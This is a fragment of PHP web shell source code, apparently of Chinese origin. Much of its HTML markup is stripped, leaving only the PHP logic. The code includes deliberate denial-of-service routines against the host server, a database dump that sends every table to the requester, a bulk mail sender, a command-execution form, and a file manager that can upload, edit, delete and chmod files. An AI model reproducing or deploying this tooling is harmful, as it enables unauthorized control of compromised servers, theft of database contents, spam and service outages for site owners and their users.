This Worked In Php 4.x.x And 5.2.9 : Dos This Server I Am Sure '.$end;exit;} if ($_GET['dosthisserver']=="1"){ function dosserver(){ $junk=str_repeat("99999999999999999999999999999999999999999999999999",99999); for($i=0;$i<2;){ $buff=bcpow($junk, '3', 2); $buff=null; } } dosserver(); } if ($_GET['dosthisserver']=="2"){ function cx(){cx();} cx(); } if ($_GET['do']=="加密转换"){ $hash=null; if ($_GET['stringtoh'] && $_GET['hashtoh']=='md5'){ $hash=md5($_GET['stringtoh']); }elseif ($_GET['stringtoh'] && $_GET['hashtoh']=='sh1'){ $hash=sha1($_GET['stringtoh']); }elseif ($_GET['stringtoh'] && $_GET['hashtoh']=='crc32'){ $hash=crc32($_GET['stringtoh']); }elseif ($_GET['stringtoh'] && $_GET['hashtoh']=='b64e'){ $hash=base64_encode($_GET['stringtoh']); }elseif ($_GET['stringtoh'] && $_GET['hashtoh']=='b64d'){ $hash=base64_decode($_GET['stringtoh']); } echo $head.'

加密转换

'.$end;exit;} if ($_GET['do']=="dump"){ echo $head.'

'; echo '

备份数据库

DB Type:
Server:
Username:
Password:
数据库操作 Name:

'.$end;exit;} if ($_POST['username'] && $_POST['dbname'] && $_POST['method']){ $date = date("Y-m-d"); $dbserver = $_POST['server']; $dbuser = $_POST['username']; $dbpass = $_POST['password']; $dbname = $_POST['dbname']; $file = "Dump-$dbname-$date"; $method = $_POST['method']; if ($method=='sql'){ $file="Dump-$dbname-$date.sql"; $fp=fopen($file,"w"); }else{ $file="Dump-$dbname-$date.sql.gz"; $fp = gzopen($file,"w"); } function write($data) { global $fp; if ($_POST['method']=='sql'){ fwrite($fp,$data); }else{ gzwrite($fp, $data); }} mysql_connect ($dbserver, $dbuser, $dbpass); mysql_select_db($dbname); $tables = mysql_query ("SHOW TABLES"); while ($i = mysql_fetch_array($tables)) { $i = $i['Tables_in_'.$dbname]; $create = mysql_fetch_array(mysql_query ("SHOW CREATE TABLE ".$i)); write($create['Create Table'].";\n\n"); $sql = mysql_query ("SELECT * FROM ".$i); if (mysql_num_rows($sql)) { while ($row = mysql_fetch_row($sql)) { foreach ($row as $j => $k) { $row[$j] = "'".mysql_escape_string($k)."'"; } write("INSERT INTO $i VALUES(".implode(",", $row).");\n"); } } } if ($method=='sql'){ fclose ($fp); }else{ gzclose($fp);} header("Content-Disposition: attachment; filename=" . $file); header("Content-Type: application/download"); header("Content-Length: " . filesize($file)); flush(); $fp = fopen($file, "r"); while (!feof($fp)) { echo fread($fp, 65536); flush(); } fclose($fp); } if ($_GET['do']=="mail"){ echo $head.'

Address :

Subject :



Number For Send :

'.$end;exit;} if ($_POST['admail'] && $_POST['submail'] ){ for($mi=0;$miChmod
To
".$end;exit; } /* if($_GET['do']=="edit"){ if($_GET['filename']=="dir"){ if(is_readable($_GET['address'])){ chdir($_GET['address']);}else{alert("Permission Denied !");} }} */ $araddresss=explode($slash,getcwd()); $matharrayy=count($araddresss)-1; $addr1backk=str_replace($araddresss[$matharrayy],"",$araddresss); for($countback=0;$countback=1){ $rr=str_replace($basep,"",getcwd()); $rr=str_replace("\\","/",$rr); $diropen=''.$parsef.''; }else{ $diropen=''.$parsef.''; } return $diropen; } if ($_GET['address']){$ifget=$_GET['address'];}if($_POST['address']){$ifget=$_POST['address'];} if($cwd==''){$cwd=getcwd();}$nowaddress=''; $ad=getcwd(); $hand=opendir("$ad"); $coi=0; $coi2=0; while (false !== ($fileee = readdir($hand))) { if ($fileee != "." && $fileee != "..") { if (filetype($fileee)=="dir"){ if ($coi %2){ $colort='"#e7e3de"'; }else{ $colort='"#e4e1de"'; } $coi++; $fil=$fil.'

'.$fileee.'

'.date("y/m/d", filectime($fileee)).''.substr(sprintf('%o', fileperms($cwd.$slash."$fileee")), -3).'DLRen Del
' ;} else{ if ($coi2 %2){ $colort='"#e7e3de"'; }else{ $colort='"#e4e1de"'; } $coi2++; $file=$file.'

'.openf($fileee).'

'.sizee(filesize($fileee)).''.date("y/m/d", filectime($fileee)).''.substr(sprintf('%o', fileperms($cwd.$slash."$fileee")), -3).'EditDLRen Del
' ;} } } echo $head.'

Now Directory : '.getcwd()."
".printdrive().'
Back

'.$fil.$file.' '.$end; ?>

'.$formg.'命令执行 :

'.$formg.'Change Dir :

'.$formg.'Create Dir :

'.$formg.'Create File :

'.$formg.'Upload :
'.$nowaddress.'

'.$formg.'Copy File :
To